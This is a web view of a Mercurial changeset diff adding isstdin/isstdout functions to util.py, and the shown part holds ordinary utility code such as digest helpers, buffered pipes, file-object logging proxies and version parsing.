##// END OF EJS Templates
util: add public isstdin/isstdout() functions
Yuya Nishihara -
r36811:eca1051e default
parent child Browse files
Show More
@@ -1,4055 +1,4061 b''
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import, print_function
17 17
18 18 import abc
19 19 import bz2
20 20 import codecs
21 21 import collections
22 22 import contextlib
23 23 import errno
24 24 import gc
25 25 import hashlib
26 26 import imp
27 27 import io
28 28 import itertools
29 29 import mmap
30 30 import os
31 31 import platform as pyplatform
32 32 import re as remod
33 33 import shutil
34 34 import signal
35 35 import socket
36 36 import stat
37 37 import string
38 38 import subprocess
39 39 import sys
40 40 import tempfile
41 41 import textwrap
42 42 import time
43 43 import traceback
44 44 import warnings
45 45 import zlib
46 46
47 47 from . import (
48 48 encoding,
49 49 error,
50 50 i18n,
51 51 node as nodemod,
52 52 policy,
53 53 pycompat,
54 54 urllibcompat,
55 55 )
56 56 from .utils import dateutil
57 57
58 58 base85 = policy.importmod(r'base85')
59 59 osutil = policy.importmod(r'osutil')
60 60 parsers = policy.importmod(r'parsers')
61 61
62 62 b85decode = base85.b85decode
63 63 b85encode = base85.b85encode
64 64
65 65 cookielib = pycompat.cookielib
66 66 empty = pycompat.empty
67 67 httplib = pycompat.httplib
68 68 pickle = pycompat.pickle
69 69 queue = pycompat.queue
70 70 socketserver = pycompat.socketserver
71 71 stderr = pycompat.stderr
72 72 stdin = pycompat.stdin
73 73 stdout = pycompat.stdout
74 74 stringio = pycompat.stringio
75 75 xmlrpclib = pycompat.xmlrpclib
76 76
77 77 httpserver = urllibcompat.httpserver
78 78 urlerr = urllibcompat.urlerr
79 79 urlreq = urllibcompat.urlreq
80 80
81 81 # workaround for win32mbcs
82 82 _filenamebytestr = pycompat.bytestr
83 83
84 84 def isatty(fp):
85 85 try:
86 86 return fp.isatty()
87 87 except AttributeError:
88 88 return False
89 89
90 90 # glibc determines buffering on first write to stdout - if we replace a TTY
91 91 # destined stdout with a pipe destined stdout (e.g. pager), we want line
92 92 # buffering
93 93 if isatty(stdout):
94 94 stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)
95 95
96 96 if pycompat.iswindows:
97 97 from . import windows as platform
98 98 stdout = platform.winstdout(stdout)
99 99 else:
100 100 from . import posix as platform
101 101
102 102 _ = i18n._
103 103
104 104 bindunixsocket = platform.bindunixsocket
105 105 cachestat = platform.cachestat
106 106 checkexec = platform.checkexec
107 107 checklink = platform.checklink
108 108 copymode = platform.copymode
109 109 executablepath = platform.executablepath
110 110 expandglobs = platform.expandglobs
111 111 explainexit = platform.explainexit
112 112 findexe = platform.findexe
113 113 getfsmountpoint = platform.getfsmountpoint
114 114 getfstype = platform.getfstype
115 115 gethgcmd = platform.gethgcmd
116 116 getuser = platform.getuser
117 117 getpid = os.getpid
118 118 groupmembers = platform.groupmembers
119 119 groupname = platform.groupname
120 120 hidewindow = platform.hidewindow
121 121 isexec = platform.isexec
122 122 isowner = platform.isowner
123 123 listdir = osutil.listdir
124 124 localpath = platform.localpath
125 125 lookupreg = platform.lookupreg
126 126 makedir = platform.makedir
127 127 nlinks = platform.nlinks
128 128 normpath = platform.normpath
129 129 normcase = platform.normcase
130 130 normcasespec = platform.normcasespec
131 131 normcasefallback = platform.normcasefallback
132 132 openhardlinks = platform.openhardlinks
133 133 oslink = platform.oslink
134 134 parsepatchoutput = platform.parsepatchoutput
135 135 pconvert = platform.pconvert
136 136 poll = platform.poll
137 137 popen = platform.popen
138 138 posixfile = platform.posixfile
139 139 quotecommand = platform.quotecommand
140 140 readpipe = platform.readpipe
141 141 rename = platform.rename
142 142 removedirs = platform.removedirs
143 143 samedevice = platform.samedevice
144 144 samefile = platform.samefile
145 145 samestat = platform.samestat
146 146 setbinary = platform.setbinary
147 147 setflags = platform.setflags
148 148 setsignalhandler = platform.setsignalhandler
149 149 shellquote = platform.shellquote
150 150 shellsplit = platform.shellsplit
151 151 spawndetached = platform.spawndetached
152 152 split = platform.split
153 153 sshargs = platform.sshargs
154 154 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
155 155 statisexec = platform.statisexec
156 156 statislink = platform.statislink
157 157 testpid = platform.testpid
158 158 umask = platform.umask
159 159 unlink = platform.unlink
160 160 username = platform.username
161 161
162 162 try:
163 163 recvfds = osutil.recvfds
164 164 except AttributeError:
165 165 pass
166 166 try:
167 167 setprocname = osutil.setprocname
168 168 except AttributeError:
169 169 pass
170 170 try:
171 171 unblocksignal = osutil.unblocksignal
172 172 except AttributeError:
173 173 pass
174 174
175 175 # Python compatibility
176 176
177 177 _notset = object()
178 178
179 179 def safehasattr(thing, attr):
180 180 return getattr(thing, attr, _notset) is not _notset
181 181
182 182 def _rapply(f, xs):
183 183 if xs is None:
184 184 # assume None means non-value of optional data
185 185 return xs
186 186 if isinstance(xs, (list, set, tuple)):
187 187 return type(xs)(_rapply(f, x) for x in xs)
188 188 if isinstance(xs, dict):
189 189 return type(xs)((_rapply(f, k), _rapply(f, v)) for k, v in xs.items())
190 190 return f(xs)
191 191
192 192 def rapply(f, xs):
193 193 """Apply function recursively to every item preserving the data structure
194 194
195 195 >>> def f(x):
196 196 ... return 'f(%s)' % x
197 197 >>> rapply(f, None) is None
198 198 True
199 199 >>> rapply(f, 'a')
200 200 'f(a)'
201 201 >>> rapply(f, {'a'}) == {'f(a)'}
202 202 True
203 203 >>> rapply(f, ['a', 'b', None, {'c': 'd'}, []])
204 204 ['f(a)', 'f(b)', None, {'f(c)': 'f(d)'}, []]
205 205
206 206 >>> xs = [object()]
207 207 >>> rapply(pycompat.identity, xs) is xs
208 208 True
209 209 """
210 210 if f is pycompat.identity:
211 211 # fast path mainly for py2
212 212 return xs
213 213 return _rapply(f, xs)
214 214
215 215 def bitsfrom(container):
216 216 bits = 0
217 217 for bit in container:
218 218 bits |= bit
219 219 return bits
220 220
221 221 # python 2.6 still have deprecation warning enabled by default. We do not want
222 222 # to display anything to standard user so detect if we are running test and
223 223 # only use python deprecation warning in this case.
224 224 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
225 225 if _dowarn:
226 226 # explicitly unfilter our warning for python 2.7
227 227 #
228 228 # The option of setting PYTHONWARNINGS in the test runner was investigated.
229 229 # However, module name set through PYTHONWARNINGS was exactly matched, so
230 230 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
231 231 # makes the whole PYTHONWARNINGS thing useless for our usecase.
232 232 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
233 233 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
234 234 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
235 235 if _dowarn and pycompat.ispy3:
236 236 # silence warning emitted by passing user string to re.sub()
237 237 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
238 238 r'mercurial')
239 239 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
240 240 DeprecationWarning, r'mercurial')
241 241
242 242 def nouideprecwarn(msg, version, stacklevel=1):
243 243 """Issue an python native deprecation warning
244 244
245 245 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
246 246 """
247 247 if _dowarn:
248 248 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
249 249 " update your code.)") % version
250 250 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
251 251
252 252 DIGESTS = {
253 253 'md5': hashlib.md5,
254 254 'sha1': hashlib.sha1,
255 255 'sha512': hashlib.sha512,
256 256 }
257 257 # List of digest types from strongest to weakest
258 258 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
259 259
260 260 for k in DIGESTS_BY_STRENGTH:
261 261 assert k in DIGESTS
262 262
263 263 class digester(object):
264 264 """helper to compute digests.
265 265
266 266 This helper can be used to compute one or more digests given their name.
267 267
268 268 >>> d = digester([b'md5', b'sha1'])
269 269 >>> d.update(b'foo')
270 270 >>> [k for k in sorted(d)]
271 271 ['md5', 'sha1']
272 272 >>> d[b'md5']
273 273 'acbd18db4cc2f85cedef654fccc4a4d8'
274 274 >>> d[b'sha1']
275 275 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
276 276 >>> digester.preferred([b'md5', b'sha1'])
277 277 'sha1'
278 278 """
279 279
280 280 def __init__(self, digests, s=''):
281 281 self._hashes = {}
282 282 for k in digests:
283 283 if k not in DIGESTS:
284 284 raise Abort(_('unknown digest type: %s') % k)
285 285 self._hashes[k] = DIGESTS[k]()
286 286 if s:
287 287 self.update(s)
288 288
289 289 def update(self, data):
290 290 for h in self._hashes.values():
291 291 h.update(data)
292 292
293 293 def __getitem__(self, key):
294 294 if key not in DIGESTS:
295 295 raise Abort(_('unknown digest type: %s') % k)
296 296 return nodemod.hex(self._hashes[key].digest())
297 297
298 298 def __iter__(self):
299 299 return iter(self._hashes)
300 300
301 301 @staticmethod
302 302 def preferred(supported):
303 303 """returns the strongest digest type in both supported and DIGESTS."""
304 304
305 305 for k in DIGESTS_BY_STRENGTH:
306 306 if k in supported:
307 307 return k
308 308 return None
309 309
310 310 class digestchecker(object):
311 311 """file handle wrapper that additionally checks content against a given
312 312 size and digests.
313 313
314 314 d = digestchecker(fh, size, {'md5': '...'})
315 315
316 316 When multiple digests are given, all of them are validated.
317 317 """
318 318
319 319 def __init__(self, fh, size, digests):
320 320 self._fh = fh
321 321 self._size = size
322 322 self._got = 0
323 323 self._digests = dict(digests)
324 324 self._digester = digester(self._digests.keys())
325 325
326 326 def read(self, length=-1):
327 327 content = self._fh.read(length)
328 328 self._digester.update(content)
329 329 self._got += len(content)
330 330 return content
331 331
332 332 def validate(self):
333 333 if self._size != self._got:
334 334 raise Abort(_('size mismatch: expected %d, got %d') %
335 335 (self._size, self._got))
336 336 for k, v in self._digests.items():
337 337 if v != self._digester[k]:
338 338 # i18n: first parameter is a digest name
339 339 raise Abort(_('%s mismatch: expected %s, got %s') %
340 340 (k, v, self._digester[k]))
341 341
342 342 try:
343 343 buffer = buffer
344 344 except NameError:
345 345 def buffer(sliceable, offset=0, length=None):
346 346 if length is not None:
347 347 return memoryview(sliceable)[offset:offset + length]
348 348 return memoryview(sliceable)[offset:]
349 349
350 350 closefds = pycompat.isposix
351 351
352 352 _chunksize = 4096
353 353
354 354 class bufferedinputpipe(object):
355 355 """a manually buffered input pipe
356 356
357 357 Python will not let us use buffered IO and lazy reading with 'polling' at
358 358 the same time. We cannot probe the buffer state and select will not detect
359 359 that data are ready to read if they are already buffered.
360 360
361 361 This class let us work around that by implementing its own buffering
362 362 (allowing efficient readline) while offering a way to know if the buffer is
363 363 empty from the output (allowing collaboration of the buffer with polling).
364 364
365 365 This class lives in the 'util' module because it makes use of the 'os'
366 366 module from the python stdlib.
367 367 """
368 368 def __new__(cls, fh):
369 369 # If we receive a fileobjectproxy, we need to use a variation of this
370 370 # class that notifies observers about activity.
371 371 if isinstance(fh, fileobjectproxy):
372 372 cls = observedbufferedinputpipe
373 373
374 374 return super(bufferedinputpipe, cls).__new__(cls)
375 375
376 376 def __init__(self, input):
377 377 self._input = input
378 378 self._buffer = []
379 379 self._eof = False
380 380 self._lenbuf = 0
381 381
382 382 @property
383 383 def hasbuffer(self):
384 384 """True is any data is currently buffered
385 385
386 386 This will be used externally a pre-step for polling IO. If there is
387 387 already data then no polling should be set in place."""
388 388 return bool(self._buffer)
389 389
390 390 @property
391 391 def closed(self):
392 392 return self._input.closed
393 393
394 394 def fileno(self):
395 395 return self._input.fileno()
396 396
397 397 def close(self):
398 398 return self._input.close()
399 399
400 400 def read(self, size):
401 401 while (not self._eof) and (self._lenbuf < size):
402 402 self._fillbuffer()
403 403 return self._frombuffer(size)
404 404
405 405 def readline(self, *args, **kwargs):
406 406 if 1 < len(self._buffer):
407 407 # this should not happen because both read and readline end with a
408 408 # _frombuffer call that collapse it.
409 409 self._buffer = [''.join(self._buffer)]
410 410 self._lenbuf = len(self._buffer[0])
411 411 lfi = -1
412 412 if self._buffer:
413 413 lfi = self._buffer[-1].find('\n')
414 414 while (not self._eof) and lfi < 0:
415 415 self._fillbuffer()
416 416 if self._buffer:
417 417 lfi = self._buffer[-1].find('\n')
418 418 size = lfi + 1
419 419 if lfi < 0: # end of file
420 420 size = self._lenbuf
421 421 elif 1 < len(self._buffer):
422 422 # we need to take previous chunks into account
423 423 size += self._lenbuf - len(self._buffer[-1])
424 424 return self._frombuffer(size)
425 425
426 426 def _frombuffer(self, size):
427 427 """return at most 'size' data from the buffer
428 428
429 429 The data are removed from the buffer."""
430 430 if size == 0 or not self._buffer:
431 431 return ''
432 432 buf = self._buffer[0]
433 433 if 1 < len(self._buffer):
434 434 buf = ''.join(self._buffer)
435 435
436 436 data = buf[:size]
437 437 buf = buf[len(data):]
438 438 if buf:
439 439 self._buffer = [buf]
440 440 self._lenbuf = len(buf)
441 441 else:
442 442 self._buffer = []
443 443 self._lenbuf = 0
444 444 return data
445 445
446 446 def _fillbuffer(self):
447 447 """read data to the buffer"""
448 448 data = os.read(self._input.fileno(), _chunksize)
449 449 if not data:
450 450 self._eof = True
451 451 else:
452 452 self._lenbuf += len(data)
453 453 self._buffer.append(data)
454 454
455 455 return data
456 456
457 457 def mmapread(fp):
458 458 try:
459 459 fd = getattr(fp, 'fileno', lambda: fp)()
460 460 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
461 461 except ValueError:
462 462 # Empty files cannot be mmapped, but mmapread should still work. Check
463 463 # if the file is empty, and if so, return an empty buffer.
464 464 if os.fstat(fd).st_size == 0:
465 465 return ''
466 466 raise
467 467
468 468 def popen2(cmd, env=None, newlines=False):
469 469 # Setting bufsize to -1 lets the system decide the buffer size.
470 470 # The default for bufsize is 0, meaning unbuffered. This leads to
471 471 # poor performance on Mac OS X: http://bugs.python.org/issue4194
472 472 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
473 473 close_fds=closefds,
474 474 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
475 475 universal_newlines=newlines,
476 476 env=env)
477 477 return p.stdin, p.stdout
478 478
479 479 def popen3(cmd, env=None, newlines=False):
480 480 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
481 481 return stdin, stdout, stderr
482 482
483 483 def popen4(cmd, env=None, newlines=False, bufsize=-1):
484 484 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
485 485 close_fds=closefds,
486 486 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
487 487 stderr=subprocess.PIPE,
488 488 universal_newlines=newlines,
489 489 env=env)
490 490 return p.stdin, p.stdout, p.stderr, p
491 491
492 492 class fileobjectproxy(object):
493 493 """A proxy around file objects that tells a watcher when events occur.
494 494
495 495 This type is intended to only be used for testing purposes. Think hard
496 496 before using it in important code.
497 497 """
498 498 __slots__ = (
499 499 r'_orig',
500 500 r'_observer',
501 501 )
502 502
503 503 def __init__(self, fh, observer):
504 504 object.__setattr__(self, r'_orig', fh)
505 505 object.__setattr__(self, r'_observer', observer)
506 506
507 507 def __getattribute__(self, name):
508 508 ours = {
509 509 r'_observer',
510 510
511 511 # IOBase
512 512 r'close',
513 513 # closed if a property
514 514 r'fileno',
515 515 r'flush',
516 516 r'isatty',
517 517 r'readable',
518 518 r'readline',
519 519 r'readlines',
520 520 r'seek',
521 521 r'seekable',
522 522 r'tell',
523 523 r'truncate',
524 524 r'writable',
525 525 r'writelines',
526 526 # RawIOBase
527 527 r'read',
528 528 r'readall',
529 529 r'readinto',
530 530 r'write',
531 531 # BufferedIOBase
532 532 # raw is a property
533 533 r'detach',
534 534 # read defined above
535 535 r'read1',
536 536 # readinto defined above
537 537 # write defined above
538 538 }
539 539
540 540 # We only observe some methods.
541 541 if name in ours:
542 542 return object.__getattribute__(self, name)
543 543
544 544 return getattr(object.__getattribute__(self, r'_orig'), name)
545 545
546 546 def __delattr__(self, name):
547 547 return delattr(object.__getattribute__(self, r'_orig'), name)
548 548
549 549 def __setattr__(self, name, value):
550 550 return setattr(object.__getattribute__(self, r'_orig'), name, value)
551 551
552 552 def __iter__(self):
553 553 return object.__getattribute__(self, r'_orig').__iter__()
554 554
555 555 def _observedcall(self, name, *args, **kwargs):
556 556 # Call the original object.
557 557 orig = object.__getattribute__(self, r'_orig')
558 558 res = getattr(orig, name)(*args, **kwargs)
559 559
560 560 # Call a method on the observer of the same name with arguments
561 561 # so it can react, log, etc.
562 562 observer = object.__getattribute__(self, r'_observer')
563 563 fn = getattr(observer, name, None)
564 564 if fn:
565 565 fn(res, *args, **kwargs)
566 566
567 567 return res
568 568
569 569 def close(self, *args, **kwargs):
570 570 return object.__getattribute__(self, r'_observedcall')(
571 571 r'close', *args, **kwargs)
572 572
573 573 def fileno(self, *args, **kwargs):
574 574 return object.__getattribute__(self, r'_observedcall')(
575 575 r'fileno', *args, **kwargs)
576 576
577 577 def flush(self, *args, **kwargs):
578 578 return object.__getattribute__(self, r'_observedcall')(
579 579 r'flush', *args, **kwargs)
580 580
581 581 def isatty(self, *args, **kwargs):
582 582 return object.__getattribute__(self, r'_observedcall')(
583 583 r'isatty', *args, **kwargs)
584 584
585 585 def readable(self, *args, **kwargs):
586 586 return object.__getattribute__(self, r'_observedcall')(
587 587 r'readable', *args, **kwargs)
588 588
589 589 def readline(self, *args, **kwargs):
590 590 return object.__getattribute__(self, r'_observedcall')(
591 591 r'readline', *args, **kwargs)
592 592
593 593 def readlines(self, *args, **kwargs):
594 594 return object.__getattribute__(self, r'_observedcall')(
595 595 r'readlines', *args, **kwargs)
596 596
597 597 def seek(self, *args, **kwargs):
598 598 return object.__getattribute__(self, r'_observedcall')(
599 599 r'seek', *args, **kwargs)
600 600
601 601 def seekable(self, *args, **kwargs):
602 602 return object.__getattribute__(self, r'_observedcall')(
603 603 r'seekable', *args, **kwargs)
604 604
605 605 def tell(self, *args, **kwargs):
606 606 return object.__getattribute__(self, r'_observedcall')(
607 607 r'tell', *args, **kwargs)
608 608
609 609 def truncate(self, *args, **kwargs):
610 610 return object.__getattribute__(self, r'_observedcall')(
611 611 r'truncate', *args, **kwargs)
612 612
613 613 def writable(self, *args, **kwargs):
614 614 return object.__getattribute__(self, r'_observedcall')(
615 615 r'writable', *args, **kwargs)
616 616
617 617 def writelines(self, *args, **kwargs):
618 618 return object.__getattribute__(self, r'_observedcall')(
619 619 r'writelines', *args, **kwargs)
620 620
621 621 def read(self, *args, **kwargs):
622 622 return object.__getattribute__(self, r'_observedcall')(
623 623 r'read', *args, **kwargs)
624 624
625 625 def readall(self, *args, **kwargs):
626 626 return object.__getattribute__(self, r'_observedcall')(
627 627 r'readall', *args, **kwargs)
628 628
629 629 def readinto(self, *args, **kwargs):
630 630 return object.__getattribute__(self, r'_observedcall')(
631 631 r'readinto', *args, **kwargs)
632 632
633 633 def write(self, *args, **kwargs):
634 634 return object.__getattribute__(self, r'_observedcall')(
635 635 r'write', *args, **kwargs)
636 636
637 637 def detach(self, *args, **kwargs):
638 638 return object.__getattribute__(self, r'_observedcall')(
639 639 r'detach', *args, **kwargs)
640 640
641 641 def read1(self, *args, **kwargs):
642 642 return object.__getattribute__(self, r'_observedcall')(
643 643 r'read1', *args, **kwargs)
644 644
645 645 class observedbufferedinputpipe(bufferedinputpipe):
646 646 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
647 647
648 648 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
649 649 bypass ``fileobjectproxy``. Because of this, we need to make
650 650 ``bufferedinputpipe`` aware of these operations.
651 651
652 652 This variation of ``bufferedinputpipe`` can notify observers about
653 653 ``os.read()`` events. It also re-publishes other events, such as
654 654 ``read()`` and ``readline()``.
655 655 """
656 656 def _fillbuffer(self):
657 657 res = super(observedbufferedinputpipe, self)._fillbuffer()
658 658
659 659 fn = getattr(self._input._observer, r'osread', None)
660 660 if fn:
661 661 fn(res, _chunksize)
662 662
663 663 return res
664 664
665 665 # We use different observer methods because the operation isn't
666 666 # performed on the actual file object but on us.
667 667 def read(self, size):
668 668 res = super(observedbufferedinputpipe, self).read(size)
669 669
670 670 fn = getattr(self._input._observer, r'bufferedread', None)
671 671 if fn:
672 672 fn(res, size)
673 673
674 674 return res
675 675
676 676 def readline(self, *args, **kwargs):
677 677 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
678 678
679 679 fn = getattr(self._input._observer, r'bufferedreadline', None)
680 680 if fn:
681 681 fn(res)
682 682
683 683 return res
684 684
685 685 DATA_ESCAPE_MAP = {pycompat.bytechr(i): br'\x%02x' % i for i in range(256)}
686 686 DATA_ESCAPE_MAP.update({
687 687 b'\\': b'\\\\',
688 688 b'\r': br'\r',
689 689 b'\n': br'\n',
690 690 })
691 691 DATA_ESCAPE_RE = remod.compile(br'[\x00-\x08\x0a-\x1f\\\x7f-\xff]')
692 692
693 693 def escapedata(s):
694 694 if isinstance(s, bytearray):
695 695 s = bytes(s)
696 696
697 697 return DATA_ESCAPE_RE.sub(lambda m: DATA_ESCAPE_MAP[m.group(0)], s)
698 698
699 699 class fileobjectobserver(object):
700 700 """Logs file object activity."""
701 701 def __init__(self, fh, name, reads=True, writes=True, logdata=False):
702 702 self.fh = fh
703 703 self.name = name
704 704 self.logdata = logdata
705 705 self.reads = reads
706 706 self.writes = writes
707 707
708 708 def _writedata(self, data):
709 709 if not self.logdata:
710 710 self.fh.write('\n')
711 711 return
712 712
713 713 # Simple case writes all data on a single line.
714 714 if b'\n' not in data:
715 715 self.fh.write(': %s\n' % escapedata(data))
716 716 return
717 717
718 718 # Data with newlines is written to multiple lines.
719 719 self.fh.write(':\n')
720 720 lines = data.splitlines(True)
721 721 for line in lines:
722 722 self.fh.write('%s> %s\n' % (self.name, escapedata(line)))
723 723
724 724 def read(self, res, size=-1):
725 725 if not self.reads:
726 726 return
727 727 # Python 3 can return None from reads at EOF instead of empty strings.
728 728 if res is None:
729 729 res = ''
730 730
731 731 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
732 732 self._writedata(res)
733 733
734 734 def readline(self, res, limit=-1):
735 735 if not self.reads:
736 736 return
737 737
738 738 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
739 739 self._writedata(res)
740 740
741 741 def readinto(self, res, dest):
742 742 if not self.reads:
743 743 return
744 744
745 745 self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
746 746 res))
747 747 data = dest[0:res] if res is not None else b''
748 748 self._writedata(data)
749 749
750 750 def write(self, res, data):
751 751 if not self.writes:
752 752 return
753 753
754 754 # Python 2 returns None from some write() calls. Python 3 (reasonably)
755 755 # returns the integer bytes written.
756 756 if res is None and data:
757 757 res = len(data)
758 758
759 759 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
760 760 self._writedata(data)
761 761
762 762 def flush(self, res):
763 763 if not self.writes:
764 764 return
765 765
766 766 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
767 767
768 768 # For observedbufferedinputpipe.
769 769 def bufferedread(self, res, size):
770 770 self.fh.write('%s> bufferedread(%d) -> %d' % (
771 771 self.name, size, len(res)))
772 772 self._writedata(res)
773 773
774 774 def bufferedreadline(self, res):
775 775 self.fh.write('%s> bufferedreadline() -> %d' % (self.name, len(res)))
776 776 self._writedata(res)
777 777
778 778 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
779 779 logdata=False):
780 780 """Turn a file object into a logging file object."""
781 781
782 782 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
783 783 logdata=logdata)
784 784 return fileobjectproxy(fh, observer)
785 785
786 786 def version():
787 787 """Return version information if available."""
788 788 try:
789 789 from . import __version__
790 790 return __version__.version
791 791 except ImportError:
792 792 return 'unknown'
793 793
794 794 def versiontuple(v=None, n=4):
795 795 """Parses a Mercurial version string into an N-tuple.
796 796
797 797 The version string to be parsed is specified with the ``v`` argument.
798 798 If it isn't defined, the current Mercurial version string will be parsed.
799 799
800 800 ``n`` can be 2, 3, or 4. Here is how some version strings map to
801 801 returned values:
802 802
803 803 >>> v = b'3.6.1+190-df9b73d2d444'
804 804 >>> versiontuple(v, 2)
805 805 (3, 6)
806 806 >>> versiontuple(v, 3)
807 807 (3, 6, 1)
808 808 >>> versiontuple(v, 4)
809 809 (3, 6, 1, '190-df9b73d2d444')
810 810
811 811 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
812 812 (3, 6, 1, '190-df9b73d2d444+20151118')
813 813
814 814 >>> v = b'3.6'
815 815 >>> versiontuple(v, 2)
816 816 (3, 6)
817 817 >>> versiontuple(v, 3)
818 818 (3, 6, None)
819 819 >>> versiontuple(v, 4)
820 820 (3, 6, None, None)
821 821
822 822 >>> v = b'3.9-rc'
823 823 >>> versiontuple(v, 2)
824 824 (3, 9)
825 825 >>> versiontuple(v, 3)
826 826 (3, 9, None)
827 827 >>> versiontuple(v, 4)
828 828 (3, 9, None, 'rc')
829 829
830 830 >>> v = b'3.9-rc+2-02a8fea4289b'
831 831 >>> versiontuple(v, 2)
832 832 (3, 9)
833 833 >>> versiontuple(v, 3)
834 834 (3, 9, None)
835 835 >>> versiontuple(v, 4)
836 836 (3, 9, None, 'rc+2-02a8fea4289b')
837 837 """
838 838 if not v:
839 839 v = version()
840 840 parts = remod.split('[\+-]', v, 1)
841 841 if len(parts) == 1:
842 842 vparts, extra = parts[0], None
843 843 else:
844 844 vparts, extra = parts
845 845
846 846 vints = []
847 847 for i in vparts.split('.'):
848 848 try:
849 849 vints.append(int(i))
850 850 except ValueError:
851 851 break
852 852 # (3, 6) -> (3, 6, None)
853 853 while len(vints) < 3:
854 854 vints.append(None)
855 855
856 856 if n == 2:
857 857 return (vints[0], vints[1])
858 858 if n == 3:
859 859 return (vints[0], vints[1], vints[2])
860 860 if n == 4:
861 861 return (vints[0], vints[1], vints[2], extra)
862 862
863 863 def cachefunc(func):
864 864 '''cache the result of function calls'''
865 865 # XXX doesn't handle keywords args
866 866 if func.__code__.co_argcount == 0:
867 867 cache = []
868 868 def f():
869 869 if len(cache) == 0:
870 870 cache.append(func())
871 871 return cache[0]
872 872 return f
873 873 cache = {}
874 874 if func.__code__.co_argcount == 1:
875 875 # we gain a small amount of time because
876 876 # we don't need to pack/unpack the list
877 877 def f(arg):
878 878 if arg not in cache:
879 879 cache[arg] = func(arg)
880 880 return cache[arg]
881 881 else:
882 882 def f(*args):
883 883 if args not in cache:
884 884 cache[args] = func(*args)
885 885 return cache[args]
886 886
887 887 return f
888 888
889 889 class cow(object):
890 890 """helper class to make copy-on-write easier
891 891
892 892 Call preparewrite before doing any writes.
893 893 """
894 894
895 895 def preparewrite(self):
896 896 """call this before writes, return self or a copied new object"""
897 897 if getattr(self, '_copied', 0):
898 898 self._copied -= 1
899 899 return self.__class__(self)
900 900 return self
901 901
902 902 def copy(self):
903 903 """always do a cheap copy"""
904 904 self._copied = getattr(self, '_copied', 0) + 1
905 905 return self
906 906
907 907 class sortdict(collections.OrderedDict):
908 908 '''a simple sorted dictionary
909 909
910 910 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
911 911 >>> d2 = d1.copy()
912 912 >>> d2
913 913 sortdict([('a', 0), ('b', 1)])
914 914 >>> d2.update([(b'a', 2)])
915 915 >>> list(d2.keys()) # should still be in last-set order
916 916 ['b', 'a']
917 917 '''
918 918
919 919 def __setitem__(self, key, value):
920 920 if key in self:
921 921 del self[key]
922 922 super(sortdict, self).__setitem__(key, value)
923 923
924 924 if pycompat.ispypy:
925 925 # __setitem__() isn't called as of PyPy 5.8.0
926 926 def update(self, src):
927 927 if isinstance(src, dict):
928 928 src = src.iteritems()
929 929 for k, v in src:
930 930 self[k] = v
931 931
932 932 class cowdict(cow, dict):
933 933 """copy-on-write dict
934 934
935 935 Be sure to call d = d.preparewrite() before writing to d.
936 936
937 937 >>> a = cowdict()
938 938 >>> a is a.preparewrite()
939 939 True
940 940 >>> b = a.copy()
941 941 >>> b is a
942 942 True
943 943 >>> c = b.copy()
944 944 >>> c is a
945 945 True
946 946 >>> a = a.preparewrite()
947 947 >>> b is a
948 948 False
949 949 >>> a is a.preparewrite()
950 950 True
951 951 >>> c = c.preparewrite()
952 952 >>> b is c
953 953 False
954 954 >>> b is b.preparewrite()
955 955 True
956 956 """
957 957
958 958 class cowsortdict(cow, sortdict):
959 959 """copy-on-write sortdict
960 960
961 961 Be sure to call d = d.preparewrite() before writing to d.
962 962 """
963 963
964 964 class transactional(object):
965 965 """Base class for making a transactional type into a context manager."""
966 966 __metaclass__ = abc.ABCMeta
967 967
968 968 @abc.abstractmethod
969 969 def close(self):
970 970 """Successfully closes the transaction."""
971 971
972 972 @abc.abstractmethod
973 973 def release(self):
974 974 """Marks the end of the transaction.
975 975
976 976 If the transaction has not been closed, it will be aborted.
977 977 """
978 978
979 979 def __enter__(self):
980 980 return self
981 981
982 982 def __exit__(self, exc_type, exc_val, exc_tb):
983 983 try:
984 984 if exc_type is None:
985 985 self.close()
986 986 finally:
987 987 self.release()
988 988
989 989 @contextlib.contextmanager
990 990 def acceptintervention(tr=None):
991 991 """A context manager that closes the transaction on InterventionRequired
992 992
993 993 If no transaction was provided, this simply runs the body and returns
994 994 """
995 995 if not tr:
996 996 yield
997 997 return
998 998 try:
999 999 yield
1000 1000 tr.close()
1001 1001 except error.InterventionRequired:
1002 1002 tr.close()
1003 1003 raise
1004 1004 finally:
